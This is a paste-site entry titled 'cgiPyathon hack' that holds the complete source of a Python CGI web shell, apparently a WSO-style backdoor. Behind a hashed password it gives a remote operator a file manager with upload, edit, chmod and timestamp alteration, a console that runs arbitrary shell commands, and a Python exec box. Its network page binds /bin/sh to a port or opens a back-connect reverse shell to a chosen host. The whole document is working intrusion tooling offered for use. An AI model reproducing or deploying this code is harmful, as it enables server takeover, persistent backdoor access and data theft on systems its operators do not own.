cgiPyathon hack

From cm3l1k1, 4 Years ago, written in Python, viewed 766 times.
URL http://paste.security-portal.cz/view/46b9068a Embed
Download Paste or View Raw
  1. #!/usr/bin/env python
  2. import sys, os, cgi, commands, time, Cookie, socket
  3. from stat import *
  4. from datetime import datetime
  5. sys.stderr = open(os.devnull, 'w')
  6.  
  7. password = "63a9f0ea7bb98050796b649e85481845"
  8. version = "0.1 [py]"
  9.  
  10.  
  11. def getall(theform, nolist = False):
  12.     data = {}
  13.     for field in theform.keys():
  14.         if type(theform[field]) ==  type([]):
  15.             if not nolist:
  16.                 data[field] = theform.getlist(field)
  17.             else:
  18.                 data[field] = theform.getfirst(field)
  19.         elif theform[field].filename:
  20.             _FILES[field] = theform[field]
  21.         else:
  22.             data[field] = theform[field].value
  23.     return data
  24.  
  25. def escape(str):
  26.     return str.replace("'", "\\'").replace("\r", "\\r").replace("\n", "\\n")
  27.  
  28. _FILES = {}
  29. _REQUEST = getall( cgi.FieldStorage() )
  30. if _REQUEST.has_key('charset') == False:
  31.     _REQUEST['charset'] = "Windows-1251"
  32. if _REQUEST.has_key('a') == False:
  33.     _REQUEST['a'] = "files"
  34. if _REQUEST.has_key('c') == False:
  35.     _REQUEST['c'] = os.getcwd()
  36. if _REQUEST.has_key('p1') == False:
  37.     _REQUEST['p1'] = ""
  38. if _REQUEST.has_key('p2') == False:
  39.     _REQUEST['p2'] = ""
  40. if _REQUEST.has_key('p3') == False:
  41.     _REQUEST['p3'] = ""
  42.  
  43. _COOKIE = Cookie.SimpleCookie()
  44. try:
  45.     _COOKIE.load(os.environ["HTTP_COOKIE"])
  46. except:
  47.     pass
  48.  
  49. def printLogin():
  50.     _COOKIE['psswd'] = "";
  51.     print _COOKIE;
  52.     print "Content-type: text/html\n";
  53.     print """<center><form method=post>Password: <input type=password name=psswd><input type=submit value='&gt;&gt;'></form></center>"""
  54.     exit()
  55.  
  56. if _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > 0 :
  57.     if _COOKIE['psswd'].value != password:
  58.         printLogin()
  59. elif _REQUEST.has_key('psswd'):
  60.         try:
  61.             import hashlib
  62.             psswd = hashlib.md5()
  63.         except:
  64.             import md5
  65.             psswd = md5.new()
  66.         psswd.update(_REQUEST['psswd'])
  67.         if psswd.hexdigest() != password:
  68.             printLogin()
  69.         else:
  70.             _COOKIE['psswd'] = psswd.hexdigest()
  71. else:
  72.     printLogin()
  73.  
  74. print _COOKIE
  75. home_dir = os.getcwd()
  76.  
  77. try:
  78.     os.chdir(_REQUEST['c'])
  79. except os.error, msg:
  80.     pass
  81.  
  82. cwd = os.getcwd();
  83. if cwd[-1] != '/':
  84.     cwd += '/'
  85.  
  86. def printHeader():
  87.     print "Content-type: text/html\n";
  88.     print "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" + _REQUEST['charset'] + "'><title>" + os.environ["SERVER_NAME"] + " - WSO " + version + """</title>
  89.    <style>
  90.        body{background-color:#444;color:#e1e1e1;}
  91.        body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
  92.        table.info{ color:#fff;background-color:#222; }
  93.        span,h1,a{ color:#df5 !important; }
  94.        span{ font-weight: bolder; }
  95.        h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
  96.        div.content{ padding: 5px;margin-left:5px;background-color:#333; }
  97.        a{ text-decoration:none; }
  98.        a:hover{ text-decoration:underline; }
  99.        .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  100.        .bigarea{ width:100%;height:250px; }
  101.        input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,"Courier New"; }
  102.        form{ margin:0px; }
  103.        #toolsTbl{ text-align:center; }
  104.        .toolsInp{ width: 300px }
  105.        .main th{text-align:left;background-color:#5e5e5e;}
  106.        .main tr:hover{background-color:#5e5e5e}
  107.        .l1{background-color:#444}
  108.        pre,.m{font-family:Courier,Monospace;}
  109.    </style>
  110.    <script>
  111.        var c_ = '""" + escape(_REQUEST['c']) + """';
  112.        var a_ = '""" + escape(_REQUEST['a']) + """';
  113.        var p1_ = '""" + escape(_REQUEST['p1']) + """';
  114.        var p2_ = '""" + escape(_REQUEST['p2']) + """';
  115.        var p3_ = '""" + escape(_REQUEST['p3']) + """';
  116.        var charset_ = '""" + escape( _REQUEST['charset'] ) + """';
  117.        function g(a,c,p1,p2,p3,charset) {
  118.            if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
  119.            if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
  120.            if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
  121.            if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
  122.            if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
  123.            if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
  124.            document.mf.submit();
  125.        }
  126.    </script>
  127.    <head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
  128.    <form method=post name=mf style='display:none;'>
  129.    <input type=hidden name=a>
  130.    <input type=hidden name=c>
  131.    <input type=hidden name=p1>
  132.    <input type=hidden name=p2>
  133.    <input type=hidden name=p3>
  134.    <input type=hidden name=charset>
  135.    </form>"""
  136.     print '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Time:<br>Cwd:</span></td>'
  137.     print '<td><nobr>'
  138.     for x in os.uname():
  139.         sys.stdout.write(x+' ')
  140.     t = time.localtime()
  141.     print '</nobr><br>%s<br>%d-%.2d-%.2d %.2d:%.2d:%.2d <span>Server IP:</span> %s <span>Client IP:</span> %s<br>' %( commands.getoutput( 'id' ), t[0], t[1], t[2], t[3], t[4], t[5], os.environ['SERVER_ADDR'], os.environ['REMOTE_ADDR'])
  142.     path = ''
  143.     paths = cwd.split('/')
  144.     paths.pop()
  145.     for x in paths:
  146.         path += x + '/'
  147.         sys.stdout.write("""<a href="#" onclick="g('files','"""+escape(path)+"""', '', '', '')">"""+x+"""/</a>""")
  148.     print " " + permsColor(cwd),"""<a href='#' onclick="g('files','"""+ escape( home_dir ) +"""', '', '', '')">[ home ]</a>"""
  149.     charsets = ['UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866']
  150.     print '<td width=1 align=right><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'
  151.     for charset in charsets:
  152.         sys.stdout.write('<option value="%s" ' % charset)
  153.         if _REQUEST['charset'] == charset:
  154.              sys.stdout.write('selected')
  155.         sys.stdout.write('>%s</option>' % charset)
  156.     print '</optgroup></select><br></td></tr></table><table style="border-top:2px solid #333;text-align: center;" cellpadding=3 cellspacing=0 width=100%><tr>'
  157.     for x in ['Files', 'Console', 'Python', 'Network']:
  158.         print "<td width='100px'>[ <a href='#' onclick='g(\""+x.lower()+'", null, "", "", "")\'>'+x+'</a> ]</td>'
  159.     print '<td></td></tr></table><div style="margin:5">'
  160.  
  161. def printFooter():
  162.     if os.access (cwd, os.W_OK):
  163.         writable = "<font color=green>[ Writeable ]</font>"
  164.     else:
  165.         writable = "<font color=red>[ Not writable ]</font>"
  166.     print """</div>
  167. <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style="border-top:2px solid #333;border-bottom:2px solid #333;">
  168.         <tr>
  169.                 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value='""" + cwd + """'><input type=submit value="&gt;&gt;"></form></td>
  170.                 <td><form onsubmit="g('fileTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value="&gt;&gt;"></form></td>
  171.         </tr>
  172.         <tr>
  173.                 <td><form onsubmit="g('files',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>
  174.                 <td><form onsubmit="g('fileTools',null,this.f.value,'save','');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>
  175.         </tr>
  176.         <tr>
  177.                 <td><form onsubmit="g('console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value="&gt;&gt;"></form></td>
  178.                 <td><form method='post' ENCTYPE='multipart/form-data'>
  179.                 <input type=hidden name=a value='files'>
  180.                 <input type=hidden name=c value='"""+cwd+"""'>
  181.                 <input type=hidden name=p1 value='uploadFile'>
  182.                 <input type=hidden name=charset value='"""+_REQUEST['charset']+"""'>
  183.                 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>
  184.         </tr>
  185.  
  186. </table>
  187. </div>
  188. </body></html>"""
  189.  
  190. def viewSize(s):
  191.     if s >= 1073741824:
  192.                 return "%1.2f  GB" % (s / 1073741824.0);
  193.     elif s >= 1048576:
  194.                 return "%1.2f  MB" % (s / 1048576.0);
  195.     elif s >= 1024:
  196.                 return "%1.2f  KB" % (s / 1024.0);
  197.     else:
  198.                 return str(s) + ' B';
  199.  
  200. def perms(p):
  201.     mode = os.lstat(p)[ST_MODE]
  202.     p = mode
  203.     i="";
  204.     if (p & 0xC000) == 0xC000:
  205.         i = 's'
  206.     elif (p & 0xA000) == 0xA000:
  207.         i = 'l'
  208.     elif (p & 0x8000) == 0x8000:
  209.         i = '-'
  210.     elif (p & 0x6000) == 0x6000:
  211.         i = 'b'
  212.     elif (p & 0x4000) == 0x4000:
  213.         i = 'd'
  214.     elif (p & 0x2000) == 0x2000:
  215.         i = 'c'
  216.     elif (p & 0x1000) == 0x1000:
  217.         i = 'p'
  218.     else:
  219.         i = 'u'
  220.     if p & 0x0100: i += 'r'
  221.     else: i += '-'
  222.     if p & 0x0080: i += 'w'
  223.     else: i += '-'
  224.     if  p & 0x0040:
  225.         if p & 0x0800: i += 's'
  226.         else: i += 'x'
  227.     else:
  228.         if p & 0x0800: i += 'S'
  229.         else: i+='-'
  230.     if p & 0x0020: i += 'r'
  231.     else: i += '-'
  232.     if p & 0x0010: i += 'w'
  233.     else: i += '-'
  234.     if  p & 0x0008:
  235.         if p & 0x0400: i += 's'
  236.         else: i += 'x'
  237.     else:
  238.         if p & 0x0400: i += 'S'
  239.         else: i += '-'
  240.     if p & 0x0004: i += 'r'
  241.     else: i += '-'
  242.     if p & 0x0002: i += 'w'
  243.     else: i += '-'
  244.     if  p & 0x0001:
  245.         if p & 0x0200: i += 't'
  246.         else: i += 'x'
  247.     else:
  248.         if p & 0x0200: i += 'T'
  249.         else: i += '-'
  250.  
  251.     return i;
  252.  
  253. def permsColor(path):
  254.     if not os.access (path, os.R_OK):
  255.         return "<font color='#FF0000'>"+perms(path)+"</font>"
  256.     elif os.access (path, os.W_OK):
  257.         return "<font color='#00BB00'>"+perms(path)+"</font>"
  258.     else:
  259.         return "<font color='white'>"+perms(path)+"</font>"
  260.  
  261. def actionConsole():
  262.     printHeader()
  263.     print "<h1>Console</h1><div class=content>"
  264.     print """<form name="cf" onSubmit="g(null, null, this.cmd.value);return false;" style="border:1px solid #df5;background-color:#555;"><textarea class=bigarea style="border:0px;" readonly>"""
  265.     if len(_REQUEST['p1']) > 0:
  266.         print '$', cgi.escape(_REQUEST['p1'])
  267.         print cgi.escape(commands.getoutput(_REQUEST['p1']))
  268.  
  269.     print '</textarea><table cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;"></td></tr></table>'
  270.     print "</form></div><script>document.cf.cmd.focus();</script>"
  271.     printFooter()
  272.  
  273. def actionFiles():
  274.     printHeader()
  275.     if _REQUEST['p1'] == 'uploadFile':
  276.         try:
  277.             if _FILES['f'].filename:
  278.                 fn = os.path.basename(_FILES['f'].filename)
  279.                 open(fn, 'wb').write(_FILES['f'].file.read())
  280.         except: pass
  281.     if _REQUEST['p1'] == 'mkdir':
  282.         try: os.mkdir(_REQUEST['p2'])
  283.         except: pass
  284.     print "<h1>File manager</h1><div class=content>"
  285.     item_stat = os.lstat('..')
  286.  
  287.     def dirItemInfo(name, item_stat):
  288.         if S_ISLNK(item_stat[ST_MODE]):
  289.             type = "link"
  290.         else:
  291.             type = "dir"
  292.         tmp = {
  293.                 'name'  : name,
  294.                 'path'  : os.path.join(cwd, name),
  295.                 'size'  : viewSize(item_stat[ST_SIZE]),
  296.                 'mtime' : datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S"),
  297.                 'uid'   : str(item_stat[ST_UID]),
  298.                 'gid'   : str(item_stat[ST_GID]),
  299.                 'perms' : permsColor(name),
  300.                 'type'  : type
  301.               }
  302.         return tmp
  303.     dirs = [dirItemInfo('..', os.lstat('..'))]
  304.     files = []
  305.  
  306.     for item in os.listdir(cwd):
  307.         item_stat = os.lstat(item)
  308.         mode = item_stat[ST_MODE]
  309.         tmp = dirItemInfo(item, item_stat)
  310.         if S_ISLNK(mode) or S_ISDIR(mode):
  311.             dirs.append(tmp)
  312.         elif S_ISREG(mode):
  313.             files.append(tmp)
  314.  
  315.     print "<table width='100%' class='main' cellspacing='0' cellpadding='2'><form method='post'>"
  316.     print """<tr><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>""";
  317.    
  318.     def sort(a, b):
  319.         return cmp(a['name'].lower(), b['name'].lower())
  320.  
  321.     line = 0
  322.     for item in sorted(dirs, sort):
  323.         print "<tr"
  324.         if line:
  325.             print " class=l1"
  326.         print "><td><a href='#' onclick='g(null,\""+escape(item['path'])+"\")'><b>[ "+cgi.escape(item['name'])+" ]</b></a></td><td>"+item['type']+"</td><td>"+item['mtime']+"</td><td>"+item['uid']+"/"+item['gid']+"</td><td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'chmod')\">"+item['perms']+"</a></td>"
  327.         print "<td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'rename')\">R</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'touch')\">T</a></td></tr>"
  328.         line = (line + 1)%2
  329.     for item in sorted(files, sort):
  330.         print "<tr"
  331.         if line:
  332.             print " class=l1"
  333.         print "><td><a href='#' onclick='g(\"fileTools\",null,\""+escape(item['name'])+"\")'>"+cgi.escape(item['name'])+"</a></td><td>"+item['size']+"</td><td>"+item['mtime']+"</td><td>"+item['uid']+"/"+item['gid']+"</td><td><a href=# onclick=\"g('fileTools', null, '"+escape(item['path'])+"', 'chmod')\">"+item['perms']+"</a></td>"
  334.         print "<td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'rename')\">R</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'touch')\">T</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'edit')\">E</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'download')\">D</a></td></tr>"
  335.         line = (line + 1)%2
  336.  
  337.     print "</form></table></div>"
  338.     printFooter()
  339.  
  340. def actionFileTools():
  341.     if _REQUEST['p2'] == "":
  342.         _REQUEST['p2'] = "view"
  343.     if _REQUEST['p2'] == "download":
  344.         print "Content-Disposition: attachment; filename=" + os.path.basename(_REQUEST['p1']) + "\n"
  345.         try:
  346.             fp = open(_REQUEST['p1'], 'rb')
  347.             for x in fp.readlines():
  348.                 sys.stdout.write(x)
  349.             fp.close()
  350.         except: pass
  351.         return
  352.     if _REQUEST['p2'] == "save":
  353.         try:
  354.             fp = open(_REQUEST['p1'], 'w')
  355.             fp.write(_REQUEST['p3'])
  356.             fp.close()
  357.         except: pass
  358.         _REQUEST['p2'] = 'edit'
  359.     printHeader()
  360.     print "<h1>File tools</h1><div class=content>"
  361.     item_stat = os.stat(_REQUEST['p1'])
  362.     print "<span>File: </span>" + os.path.basename(_REQUEST['p1']) + " <span>Size: </span> " +viewSize(item_stat[ST_SIZE]) + " <span>Permission:</span> " +permsColor(_REQUEST['p1'])
  363.     print "<br/>"
  364.     if S_ISDIR(item_stat[ST_MODE]):
  365.         menu = ['Chmod', 'Rename', 'Touch']
  366.     else:
  367.         menu = ['View', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch']
  368.     for x in menu:
  369.         print "<a href=# onclick=\"g(null, null, null, '"+x.lower()+"')\">"
  370.         if x.lower() == _REQUEST['p2']:
  371.             print "<b>[ " + x + " ]</b>"
  372.         else:
  373.             print x
  374.         print "</a> "
  375.     print "<br><br>";
  376.     if _REQUEST['p2'] == "view":
  377.         try:
  378.             fp = open(_REQUEST['p1'], 'r')
  379.             print "<pre class=ml1>"
  380.             for x in fp.readlines():
  381.                 sys.stdout.write(cgi.escape(x))
  382.             fp.close()
  383.             print "</pre>"
  384.         except:
  385.             print "Can't open file! "+_REQUEST['p1']
  386.     if _REQUEST['p2'] == "edit":
  387.         try:
  388.             fp = open(_REQUEST['p1'], 'r')
  389.             print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'save', this.f.value);return false;\"><textarea name=f class=bigarea>"
  390.             for x in fp.readlines():
  391.                 sys.stdout.write(cgi.escape(x))
  392.             fp.close()
  393.             print "</textarea><input type='submit' value='&gt;&gt;'></form>"
  394.         except:
  395.             print "Can't open (create) file! "+_REQUEST['p1']
  396.     if _REQUEST['p2'] == "chmod":
  397.         import stat, string
  398.         if len(_REQUEST['p3']):
  399.             perm = string.atoi(_REQUEST['p3'], 8)
  400.             try:
  401.                 os.chmod(_REQUEST['p1'], perm)
  402.                 print "Done"
  403.             except: print "Fail!"
  404.         print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'chmod', this.p.value);return false;\"><input type='text' name='p' value='"
  405.         print "%o" % stat.S_IMODE(os.stat(_REQUEST['p1'])[ST_MODE])
  406.         print "'/><input type='submit' value='&gt;&gt;'></form>"
  407.     if _REQUEST['p2'] == "rename":
  408.         if len(_REQUEST['p3']):
  409.             try:
  410.                 os.rename(_REQUEST['p1'], _REQUEST['p3'])
  411.                 _REQUEST['p1'] = _REQUEST['p3']
  412.                 print "Done<script>p2_='" + escape(_REQUEST['p3']) + "'</script>"
  413.             except: print "Fail!"
  414.         print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'rename', this.n.value);return false;\"><input type='text' name='n' value='" + escape(_REQUEST['p1'])+ "'/><input type='submit' value='&gt;&gt;'></form>"
  415.  
  416.     if _REQUEST['p2'] == "touch":
  417.         if len(_REQUEST['p3']):
  418.             try:
  419.                 tmstmp = time.mktime(time.strptime(_REQUEST['p3'], "%Y-%m-%d %H:%M:%S"))
  420.                 os.utime(_REQUEST['p1'], (tmstmp, tmstmp))
  421.                 item_stat = os.stat(_REQUEST['p1'])
  422.                 print "Done"
  423.             except: print "Fail!"
  424.         print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'touch', this.n.value);return false;\"><input type='text' name='n' value='"
  425.         print datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S")
  426.         print "'/><input type='submit' value='&gt;&gt;'></form>"
  427.  
  428.     print "</div>"
  429.     printFooter()
  430.  
  431. def actionPython():
  432.     printHeader()
  433.     print "<h1>Exec python code</h1><div class=content>"
  434.     print """<form name="cf" onSubmit="g(null, null, this.c.value);return false;"><textarea class=bigarea name=c>"""
  435.     print '</textarea><input type=submit value="&gt;&gt;">'
  436.     if len(_REQUEST['p1']) > 0:
  437.         print '<pre class="ml1" style="margin-top:5px;">'
  438.         try:
  439.             import StringIO
  440.             old_stdout = sys.stdout
  441.             sys.stdout = StringIO.StringIO()
  442.             exec(_REQUEST['p1'])
  443.             data = sys.stdout.getvalue()
  444.             sys.stdout = old_stdout
  445.             print cgi.escape(data)
  446.         except:
  447.             pass
  448.         print '</pre>'
  449.     print "</form></div>"
  450.     printFooter()
  451.  
  452. def actionNetwork():
  453.     printHeader()
  454.     print """<h1>Network tools</h1><div class=content>
  455.    <form name='nfp' onSubmit="g(null,null,'bp',this.port.value);return false;">
  456.         <span>Bind port to /bin/sh</span><br/>
  457.         Port: <input type='text' name='port' value='31337'><input type=submit value=">>">
  458.         </form>
  459.         <form name='nfp' onSubmit="g(null,null,'bc',this.server.value,this.port.value);return false;">
  460.         <span>Back-connect to</span><br/>
  461.         Server: <input type='text' name='server' value='"""+os.environ['REMOTE_ADDR']+"""'> Port: <input type='text' name='port' value='31337'><input type=submit value=">>">
  462.         </form><br>"""
  463.     if _REQUEST['p1'] != "":
  464.         sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  465.         sock.settimeout(10)
  466.     if _REQUEST['p1'] == "bp":
  467.         try:
  468.             sock.bind(('localhost', int(_REQUEST['p2'])))
  469.             sock.listen(0)
  470.         except:
  471.             print "error"
  472.         else:
  473.             print "done"
  474.         if os.fork()!=0:
  475.             (c,addr)=sock.accept()
  476.             os.dup2(c.fileno(), 0)
  477.             os.dup2(c.fileno(), 1)
  478.             os.dup2(c.fileno(), 2)
  479.             os.system('/bin/sh -i')
  480.             c.shutdown(2)
  481.             sock.shutdown(2)
  482.     elif _REQUEST['p1'] == "bc":
  483.         try:
  484.             sock.connect( (_REQUEST['p2'], int(_REQUEST['p3'])) )
  485.         except:
  486.             print "error"
  487.         else:
  488.             print "done"
  489.             if os.fork()!=0:
  490.                 os.dup2(sock.fileno(), 0)
  491.                 os.dup2(sock.fileno(), 1)
  492.                 os.dup2(sock.fileno(), 2)
  493.                 os.system('/bin/sh -i')
  494.                 sock.shutdown(2)
  495.     print "</div>"
  496.     printFooter()
  497.  
  498.  
  499. try:
  500.     {
  501.         'files' : actionFiles,
  502.         'fileTools' : actionFileTools,
  503.         'console' : actionConsole,
  504.         'python' : actionPython,
  505.         'network' : actionNetwork
  506.     }[_REQUEST['a']]()
  507. except KeyError:
  508.     printHeader()
  509.     printFooter()
  510.  

Reply to "cgiPyathon hack"

Here you can reply to the paste above